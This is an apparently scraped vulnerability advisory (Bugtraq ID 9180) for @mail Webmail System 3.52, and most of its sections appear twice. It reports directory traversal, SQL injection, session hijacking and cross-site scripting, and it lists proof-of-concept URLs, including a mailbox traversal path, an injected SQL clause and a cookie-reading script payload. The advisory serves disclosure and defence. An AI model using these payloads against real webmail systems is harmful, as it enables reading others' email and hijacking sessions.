@mail Webmail System Multiple Vulnerabilities
BID:9180
Info
@mail Webmail System Multiple Vulnerabilities
| Bugtraq ID: | 9180 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 09 2003 12:00AM |
| Updated: | Dec 09 2003 12:00AM |
| Credit: | The disclosure of these issues has been credited to Nick Gudov <[email protected]>. |
| Vulnerable: |
CalaCode @mail Webmail System 3.52 Demo |
| Not Vulnerable: | |
Discussion
@mail Webmail System Multiple Vulnerabilities
It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.
It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.
Exploit / POC
@mail Webmail System Multiple Vulnerabilities
The following proof of concept examples have been provided:
http://www.example.com/showmail.pl?Folder=../../[email protected]/mbox/Inbox
http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='[email protected]&print=1
http://www.example.com/parse.pl?file=html/english/xp/xplogin.html
http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script>
The following proof of concept examples have been provided:
http://www.example.com/showmail.pl?Folder=../../[email protected]/mbox/Inbox
http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='[email protected]&print=1
http://www.example.com/parse.pl?file=html/english/xp/xplogin.html
http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script>
Solution / Fix
@mail Webmail System Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
@mail Webmail System Multiple Vulnerabilities
References:
References:
- @mail Webmail System (CalaCode)
- @Mail web interface multiple security vulnerabilities ( S-Quadra Security Research
)